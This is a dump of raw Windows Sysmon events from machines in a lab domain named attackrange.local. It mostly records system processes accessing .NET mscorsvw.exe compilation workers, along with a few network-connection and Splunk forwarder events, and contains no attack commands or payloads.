14:57:51.139{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-720D-00000000BB01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.123{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-720D-00000000BB01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.123{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-720D-00000000BB01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.076{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-710D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.061{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-710D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.061{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-710D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.014{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEF-607E-700D-00000000BB01}3008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.998{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEF-607E-700D-00000000BB01}3008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:50.998{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEF-607E-700D-00000000BB01}3008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000050334Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:49.924{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65132-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050333Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:51.603{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C323B67B800020179C99A4DF5027AAC6,SHA256=2C07FEB5BD3DF91C6933573449287D87F56DBAA2985F354F94A055E30DE49916,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.951{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-870D-00000000BB01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.936{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-870D-00000000BB01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-870D-00000000BB01}4960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000076342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:51.065{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57542-false10.0.1.12-8000- 10341000x800000000000000076341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.889{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-860D-00000000BB01}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.873{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-860D-00000000BB01}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.873{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-860D-00000000BB01}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.811{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-850D-00000000BB01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.795{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-850D-00000000BB01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.795{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-850D-00000000BB01}7148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-840D-00000000BB01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.748{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF0-607E-840D-00000000BB01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.748{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF0-607E-840D-00000000BB01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:52.686{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF0-607E-830D-00000000BB01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 